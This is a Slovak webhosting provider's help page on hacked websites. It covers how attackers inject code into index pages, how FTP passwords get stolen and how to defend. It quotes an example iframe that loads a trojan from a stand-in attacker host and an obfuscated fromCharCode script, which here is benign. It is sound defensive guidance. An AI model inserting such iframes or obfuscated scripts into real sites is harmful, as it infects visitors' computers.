Jazyková verzia

Overenie domény

overiť, či je doména voľná

Hlavné menu

Rýchla navigácia
kde som: úvod > nápoveda > kategória prevádzka webstránok (webhosting) > Zneužitie webového priestoru

Zneužitie webového priestoru (škodlivý kód na stránke)

V poslednom období sa na internete vo veľkom rozmohlo zneužívanie webových stránok na šírenie škodlivého kódu. Ak ste zistili, že vaše stránky sú neštandardne upravené alebo pozmenené bez vášho vedomia, je veľmi pravdepodobné, že ste sa aj vy stali obeťou takéhoto útočníka. Väčšinou (nemusí to však byť pravidlo) dochádza k napadnutiu indexových stránok ako napríklad index.html, index.htm a index.php.

Najčastejšie príklady zneužitia:

<iframe src="http://utocnik.cn/trojan.cgi?akcia"</iframe>

alebo skript spúšťaný javascriptom

<script> document.write(String.fromCharCode (60,112,62,119,104,97,116,32,101,120,97,99,116,108,121,32, 105,115,32,97,100,119,97,114,101,63,32,99,97,110,32,105,116,32,97,102,102,101,99,116,32,109, 121,32,112,99,63,32,99,97,110,32,105,116,32,97,102,102,101,99,116,32,109,121,32,105,110,116, 101,114,110,101,116,32,99,111,110,110,101,99,116,105,118,105,116,121,63,32,115,104,111,117, 108,100,32,105,32,98,101,32,119,111,114,114,105,101,100,63,60,47,112,62,10)); </script>

Ak teda objavíte na svojich stránkach takýto kód, tak je potrebné ho odtiaľ ihneď vymazať. Prezeranie takýchto stránok totiž môže spôsobiť zavírenie počítača! Antivírusové programy ale aj niektoré internetové prehliadače (napr. Mozilla Firefox) môžu zablokovať prístup na prezeranie vašich stránok, preto je potrebné riešiť tento problém čo najskôr.

Ako sa to mohlo stať?

Útočník, ktorý vám tento škodlivý kód nahral do vášho webového priestoru poznal vaše prihlasovacie údaje (názov ftp servera, vaše prihlasovacie meno aj vaše heslo), alebo vaša webová aplikácia obsahovala bezpečnostnú chybu (napr. môže ísť o neaktuálnu verziu opensource webovej aplikácie ako sú Joomla, WordPress, phpBB atď.)

Ako mohol útočník poznať moje heslo na FTP?

Najčastejší spôsob získania vášho hesla je napadnutie vášho počítača trójskym koňom, ktorý dokáže vaše heslo prečítať napríklad z Total Commanderu (viac info nájdete v tomto článku), kde ho máte uložené. Keďže komunikácia cez FTP prebieha nešifrovane (je to vlastnosť tohto protokolu), tak trójsky kôň dokáže vaše heslo odchytiť aj pri bežnej komunikácii cez FTP aj cez iných FTP klientov.

Ako sa brániť proti zneužitiu FTP hesla?

Je veľmi dôležité, aby ste sa na FTP pripájali len z počítača, ktorý má pravidelne aktualizovaný operačný systém a používa antivírusový a antispyware software. Na prístup na ftp používajte zabezpečené pripojenie cez FTPs a neukladajte heslá vo Vašom počítači, hlavne nie v Total Commanderi.

Ako sa brániť proti zneužitiu webovej aplikácie?

Bezpečnosť webových aplikácii je veľmi široká oblasť, v ktorej by mal mať prehľad každý tvorca resp. programátor webovej aplikácie. Ak ale používate nejakú opensource aplikáciu, tak je veľmi dôležité, aby ste sledovali jej vývoj a pravidelne ju aktualizovali. Súčasťou nových verzií býva väčšinou aj oprava objavených chýb.